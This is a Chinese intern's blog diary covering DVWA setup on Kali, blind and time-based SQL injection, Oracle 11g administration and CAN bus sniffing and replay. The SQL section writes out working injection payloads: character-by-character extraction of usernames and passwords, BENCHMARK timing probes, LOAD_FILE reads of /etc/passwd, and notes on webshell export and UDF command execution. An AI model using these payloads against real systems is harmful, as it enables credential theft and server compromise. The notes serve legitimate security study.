• [CATARC_2017] 第三周 & 残四周


    第一天 (5.22)

    一如既往的早餐 和Kali一起战斗!

    狂想曲

    ENIAC CNNIC vulnerability

    KALI LINUX LAMP DVWA!!

    将DVWA放到var/www/html下

    T:

    root@Ares:~# service apache2 start
    root@Ares:~# service mysql start

    mysql -u root

    create database dvwa

    exit

    Firefox 地址栏输入: http://localhost/dvwalso/setup.php

    似曾相识的错误: 

    (1)PHP function allow_url_include disabled

    root@Ares:~# find / -name "php.ini"
    /var/www/html/dvwalso/php.ini
    /root/Downloads/dvwa/dvwalso/php.ini
    /etc/php/7.0/cli/php.ini
    /etc/php/7.0/apache2/php.ini
    打开/etc/php/7.0/apache2/php.ini,找到
    allow_url_include=Off
    改为
    allow_url_include=On

    (2)Could not connect to the mysql service. please check the config file

    打开/xampp/htdocs/dvwa/config/config.inc.php,将
    $_DVWA['db_user'] = 'root'$_DVWA[''db_password] = 'p@ssw0rd'
    改为
    $_DVWA[ 'db_user' ] = 'root';$_DVWA[ 'db_password' ] = '';  //mysql的默认用户名和密码
     
    (3)reCAPTCHA key:Missing
    打开/xampp/htdocs/dvwa/config/config.inc.php,将
    $_DVWA[ 'recaptcha_public_key' ] = '';$_DVWA[ 'recaptcha_private_key' ] = '';
    改为
    $_DVWA[ 'recaptcha_public_key' ] = '6LdK7xITAAzzAAJQTfL7fu6I-0aPl8KHHieAT_yJg';$_DVWA[ 'recaptcha_private_key' ] = '6LdK7xITAzzAAL_uw9YXVUOPoIHPZLfw2K1n5NVQ';



    第二天 (5.23)

    有会议... 一起帮公司布置会场;

    会议内容

    第三天 (5.24)

    深入学习SQL注入

    盲注 (Blind Injection)

    Web Server 关闭了错误回显

    e.g.

    If URL: http:/newspaper.com/items.php?id=2

    SELECT title, description, body FROM items WHERE ID = 2

    Else if URL: http:/newspaper.com/items.php?id=2 and 1=2

    SELECT title, description, body FROM items WHERE ID=2 AND 1=2

    Else if URL: http:/newspaper.com/items.php?id=2 and 1=1

    SELECT title, description, body FROM items WHERE ID=2 AND 1=1

    Timing Attack

    BENCHMARK(count, expression): 将表达式 expression 执行 count 次; in mySQL

    e.g.1

    SELECT BENCHMARK(1000000,ENCODE('HELLO','GOODBYE'));

    可以看到用时 0.21 秒; 可以通过返回的时间是否变长来判断注入语句是否执行成功 ^_^

    边信道攻击

    e.g.2 验证数据库名等名称

    id = 1170 UNION SELECT 
    IF(SUBSTRING(current, 1, 1) = CHAR(xxx), BENCHMARK(5000000, ENCODE('MSG', 'by 5 seconds')), null)
    FROM (Select Database() as current) as tb1;

    system_user();

    current_user();

    last_insert_id();

    current_user 具有写权限:

    id = 1170 UNION ALL SELECT table_name, table_type, engine FROM information_schema.tables
    WHERE table_schema =
    IF(SUBSTRING(current, 1, 1) = CHAR(xxx), BENCHMARK(5000000, ENCODE('MSG', FROM (Select Database() as current) as tb1;

    技巧

    id = 5 and subtring(@@version, 1, 1) = 4;
    id = 5 union all select 1, 2, 3 from admin; -- isExist(TAB_NYM, admin)
    id = 5 union all select 1, 2, passwd from admin; -- isExist(COL_NYM, passwd)
    
    

    通过判断字符范围:

    ...
    id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 64;
    
    
    id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 65;
    
    
    id = 5 and ascii(substring((select concat(username, 0x3a, passwd) from users limit 0, 1), 1, 1)) > 66;
    ...

    自动化SQL注入工具: sqlmap.py

    读写文件:

    ...UNION SELECT 1, 1, LOAD_FILE('/etc/passwd'),1,1;

    CREATE TABLE aresoul(line BLOB);
    
    UNION SELECT 1,1, HEX(LOAD_FILE('/etc/passwd')),1,1 INTO DUMPFILE '/tmp/aresoul';
    
    LOAD DATA INFILE '/tmp/aresoul' INTO TABLE aresoul;

    导出 webshell or
    用户自定函 (UDF):

    创建UDF:

    CREATE FUNCTION ares_defedf RETURNS INTEGER SONAME aresoul1

    only in before MySQL 5;

    lib_mysqludf_sys: sys_eval(), sys_exec(), sys_get(), sys_set()... // 执行输出 执行返码 获取环量 设置环量

    asp

    老爸生日! Happy Father!

    下班直接回家给老爸过生日(见个面);

    第四天 (5.25)

    课程表 SQL注入实战; 梁爽姐姐讲解SQL;

    第五天 (5.26)

    Oracle 11g 安装与配置

    Oracle

    11g RDBMS

    11.2RELEASE.0.3SMALL.0

    10.2.0.5.0

    11.2.0.4.0

    LICENSE 无序列号

    停服务 国税总局 安徽省 半夜升级 甲骨文喝茶

    virtual box

    ORACLE_BASE

    ORACLE_HOME

    20GB

    mongoDB mySQL ALI 双11

    ORACLE 大了 不灵活 前进慢

    ORACLE_SID.dmt

    SETUP.exe

    数据库软件 客户端 绿色版

    企业版 个人版

    ORACLE diag xsz admin

    cmd netca 1521

    network/admin/listener.ora

    监听

    status start stop

    创建数据库

    EM管理 

    sys/ system/ dbsnmp 口令

    数据库文件路径

    快速恢复区

    内存分配 sga pga

    数据快和连接进程数

    utf-8

    win ORACLE环境变量

    o'ra

    角色 权限

    CONNECT RESOURCE DBA大 EXP_FULL_DATABASE IMP_FULL_DATABACE

    系统权限 实体权限

    sys大 system

    导入导出

    EXP IMP

    完全 EXP SYSTEM/MANAGER BUFFER=64000 FILE=C:/

    用户 DMP

    表TABLES=(SONIC)

    数据泵 impdp expdp 空表

    自己查表

    Linux 远程地址 Linux安装Oracle()

     

    第六天 (5.27)

    Database Developer

    IMP

    再一天 (5.31)

    梁爽姐姐详解CAN总线

    CAN总线逆向

      CAN协议不同

      CAN总线: 6 H 14 L 

      TJA1054 SJA

    OBD 连接器引脚  4/5 GRD

    物理层 数据链路层

    CAN ECU 多个滤波器 自己ID 11bits 数据 64bits

    can-utils

    TCPdump

    Candump Canplayer Cansend

    socketCAN

    虚拟can网络

    TEST

    串行Can设备 M哦对 

    Slcan_attach -f -s6//500

    监听 回放

    Candump slcan0 -L >> log0.log

    Canplayer -l 20/loop -I 日志.log -v

    再二天 (6.1)

    儿童节, 放一天假

    再三天 (6.2)

    CAN总线实战(是另一个组QAQ)

  • 相关阅读:
    [Real World Haskell翻译]第24章 并发和多核编程 第一部分并发编程
    [Real World Haskell翻译]第22章 扩展示例:Web客户端编程
    [Real World Haskell翻译]第27章 网络通信和系统日志 Sockets and Syslog
    druid 解密
    git clone 所有远程分支到本地
    十、Delphi 把Json转成Delphi实体类
    XML External Entity attack/XXE攻击
    大家好!
    XXE攻防——XML外部实体注入
    ubuntu安装Go环境
  • 原文地址:https://www.cnblogs.com/cragoncanth/p/6893019.html
Copyright © 2020-2023  润新知